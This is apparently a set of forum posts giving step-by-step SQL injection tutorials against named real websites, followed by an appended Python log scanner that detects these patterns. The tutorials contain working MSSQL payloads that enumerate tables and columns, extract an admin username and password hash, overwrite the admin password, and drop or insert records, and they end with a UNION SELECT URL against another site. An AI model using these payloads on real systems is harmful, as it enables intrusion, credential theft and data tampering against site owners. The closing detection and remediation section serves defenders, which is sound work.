Today, at the request of a few of you, I'm putting together this tut; hope you'll support it. OK, victim:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615
This one has an advanced SQL injection bug; apply whatever fits the bug you run into. OK, let's start. Vulnerable link:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615'
It spits out this error:
Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '' /thitruongdatviet/chitiettintuc.asp, line 50
OK, we start exploiting:
Code: ; begin declare @emiu varchar(8000) set @emiu=':' select @emiu=@emiu %2btable_name%2b'/' from information_schema.tables select @emiu as id into hoangtan end
With the query above we gather all the tables into a table named hoangtan. Apply it:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615; begin declare @emiu varchar(8000) set @emiu=':' select @emiu=@emiu%2btable_name%2b'/' from information_schema.tables select @emiu as id into hoangtan end
No error at all, so the first step succeeded. To see the tables in table hoangtan:
Code: or 1=(select id from hoangtan)
Apply:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615or 1=(select id from hoangtan)
Look at that, all the tables. Now we start guessing which table holds the login info; I guess the table ADMIN, let's try:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615and = convert(int,(select top column_name from information_schema.columns where table_name =('ADMIN') and column_name not in (''))) sp_password
That query means: get the columns of the table. Here is the column:
Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'User_Name' to a column of data type int /thitruongdatviet/chitiettintuc.asp, line 50
We have the column User_Name. Keep going:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615and = convert(int,(select top column_name from information_schema.columns where table_name =('ADMIN') and column_name not in ('User_Name'))) sp_password
The second column:
Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'PassWord' to a column of data type int /thitruongdatviet/chitiettintuc.asp, line 50
If you want all the columns, take them; I only need these. Now we get the info from the columns:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615and = convert(int,(select top User_Name from ADMIN))-sp_password
Hehe, error:
Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'hoanglienson' to a column of data type int /thitruongdatviet/chitiettintuc.asp, line 50
username: hoanglienson. Now the pass:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615and = convert(int,(select top PassWord from ADMIN))-sp_password
Here's the pass:
Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value '40c72ddbf251c6ccaab3869d2b97690fd206ad3b808ce993ce6ca2c5fd602721' to a column of data type int /thitruongdatviet/chitiettintuc.asp, line 50
The pass is hashed. Oh well, we continue by updating the pass for fun:
Code: update table set column ='pass hash' where column ='ten tim dc'
Figure it out yourself:
Code: http://www.thitruongdatviet.com/thitruongdatviet/chitiettintuc.asp?ID=615update ADMIN set PassWord ='e10adc3949ba59abbe56e057f20f883e' where User_Name ='hoanglienson'
No error reported, success; all that's left is finding the login link. I'll stop here.
tut by hoangtan2312

Guide to hacking the SQL bug
Find a site that has the SQL bug. victim (just an example):
Code: http://www.thanggiangho.com/products.asp?id=44'
(hack = the way you query) (query)
First, Step 1: get table_name
Append the following code to the vulnerable site:
Code: and 1=convert(int,(select top table_name from information_schema.tables where table_name not in(''))) sp_password
Note whether the ' mark is there or not.
- If the table_name found is, say, table1, check its next table:
Code: and 1=convert(int,(select top table_name from information_schema.tables where table_name not in('table1')))-sp_password
Keep going until you find the table_name holding the admin info, e.g. tbladmin, admin, user, tbuser.
Step 2: Get column
Having found the table_name holding the admin info, we get the column_name. Suppose table1 holds the admin info:
Code: and 1=convert(int,(select top column_name from information_schema.columns where table_name='table1')) sp_password
Say we find that the first column of table1 is username. Continue to get the next column of table1:
Code: and 1=convert(int,(select top column_name from information_schema.columns where table_name='table1' and column_name not in('username'))) sp_password
If we find username/password in table1, we check the pass.
Step 3: Check pass
table_name: table1; column_name of table1: username/password
Code: and 1=convert(int,(select top username%2b'/'%2bpassword from table1)) sp_password
Done, we have the pass. Now all that's left is finding its admin link; to get the admin link you can use bro X's scan tool.
Some other queries:
- Create a table_name:
Code: ;drop table thanggiangho create table thanggiangho (id int identity,hce_group varchar(99)) insert into thanggiangho select table_name from information_schema.tables sp_password
- Change the admin pass, e.g. username: thang / pass: giangho
Code: ;UPDATE table1 SET password = 'pass mới' WHERE username='thang'
- Insert a record into the table
Code: ;INSERT INTO 'table1' ('ID', 'username', 'password', 'details') VALUES (99,'thang2','giangho2','NA')
- Find all related tables such as admin, user, member, account, login < tip from bro ML
Code: and = convert(int,(select top table_name from information_schema.tables where table_name like '%admin%' or table_name like '%Member%' or table_name like '%User%' or table_name like '%account %' or table_name like '%login%')) sp_password
Update by ML:
Code: and = convert(int,(select top table_name from information_schema.tables where table_name not in ('') and (table_name like '%25admin%25' or table_name like '%25Member%25' or table_name like '%25User%25' or table_name like '%25account%25' or table_name like '%25login%25'))) sp_password
Additions:
- Get all table_names:
Code: ; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp %2btable_name%2b'/' from information_schema.tables select @temp as id into thanggiangho end
Code: or 1=(select id from thanggiangho)
Code: ; drop table thanggiangho
- Get all column_names from a table_name, e.g. table_name: tbadmin
Code: ; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp %2bcolumn_name%2b'/' from information_schema.columns where table_name='tbadmin' select @temp as id into thanggiangho end
Code: or 1=(select id from thanggiangho)

Next up:
http://www.mondeveloppeur.com/tst/index.php?option=com_adress&Itemid=31&exe=View&pid=82%20UniOn%20SeLeCt%201,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12%20from%20information_schema.tables&publish=1
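Every request in the posts above leaves a recognisable trace in the web server's request log: a stray quote on a numeric parameter followed by a 500, information_schema lookups, convert(int, ...) used to force the '80040e07' conversion error, stacked ";begin ... into <table> end" batches, and the trailing sp_password token. The Python below is an added defender-side illustration, not code from any of the thread's authors: it decodes IIS W3C-style request lines (the six log lines are constructed and name no real site) and flags those patterns per client. Field layout, indicator names and the 500-status heuristic are this example's own assumptions.

```python
"""Flag the error-based MSSQL injection patterns quoted in the thread in
web-server request logs.  Added defender-side example; constructed input."""
import re
from collections import Counter
from urllib.parse import unquote, unquote_plus

# Constructed IIS W3C-style lines (assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
LOGS = """\
2010-03-01 10:00:01 10.0.0.5 GET /news/detail.asp ID=615 200
2010-03-01 10:00:07 10.0.0.5 GET /news/detail.asp ID=615' 500
2010-03-01 10:00:15 10.0.0.5 GET /news/detail.asp ID=615;+begin+declare+@t+varchar(8000)+set+@t=':'+select+@t=@t%2btable_name%2b'/'+from+information_schema.tables+select+@t+as+id+into+tmp_x+end 200
2010-03-01 10:00:22 10.0.0.5 GET /news/detail.asp ID=615+and+1=convert(int,(select+column_name+from+information_schema.columns+where+table_name='ADMIN'))--sp_password 500
2010-03-01 10:00:30 10.0.0.9 GET /index.php pid=82%20UniOn%20SeLeCt%201,2,unhex(hex(table_name)),4%20from%20information_schema.tables 200
2010-03-01 10:00:40 10.0.0.9 GET /news/detail.asp ID=616 200
"""

# One indicator per technique shown in the thread (matched on the decoded query).
INDICATORS = {
    "quote_probe":   re.compile(r"=\d+'"),                              # ID=615'  -> '80040e14' unclosed quote
    "schema_enum":   re.compile(r"information_schema\.(tables|columns)", re.I),
    "convert_error": re.compile(r"convert\s*\(\s*int\s*,", re.I),       # forces the '80040e07' conversion error
    "stacked_query": re.compile(r";\s*(begin|drop\s+table|create\s+table|insert\s+into|update\s+\w+\s+set)", re.I),
    "union_select":  re.compile(r"union\s+select", re.I),
    "sp_password":   re.compile(r"sp_password", re.I),                  # SQL Server redacts such batches from its own trace
}

LINE_RX = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def decode(query: str) -> str:
    """Decode '+' and %XX once, then %XX again so double-encoded payloads
    (%2b, %25admin%25) are inspected in clear without turning '+' into spaces."""
    return unquote(unquote_plus(query))


def inspect(line: str):
    """Return a finding for one log line, or None when it parses and looks clean."""
    m = LINE_RX.match(line.strip())
    if not m:
        return None
    _date, _time, client, _method, stem, query, status = m.groups()
    decoded = decode(query)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    if not hits:
        return None
    return {
        "client": client,
        "stem": stem,
        "status": int(status),
        "query": decoded,
        "indicators": hits,
        # An indicator plus a 500 means the database error page was probably
        # returned to the client, i.e. the error-based leak likely worked.
        "error_leak": status == "500",
    }


def scan(log_text: str):
    """All findings, in log order."""
    return [f for f in (inspect(l) for l in log_text.splitlines()) if f]


def clients_by_hits(findings):
    """Flagged requests per client address, most active first."""
    return Counter(f["client"] for f in findings).most_common()


if __name__ == "__main__":
    found = scan(LOGS)
    for f in found:
        flag = "LEAK?" if f["error_leak"] else "probe"
        print(f"{f['client']} {f['stem']} [{flag}] {', '.join(f['indicators'])}")
    print(clients_by_hits(found))
```

Two points the thread itself makes a defender should take from this: the payloads are sent as ordinary GET parameters, so the web tier (IIS logs, a reverse proxy, a WAF) is where they are visible, and the trailing sp_password token is there precisely because SQL Server replaces the text of any batch containing it in trace output, so database-side tracing will not show these statements. The durable fix is the one the vulnerable ASP page lacks: bind ID as a parameter (ADODB.Command with a typed parameter, or at minimum CLng on the value) and return a generic error page instead of the OLE DB message.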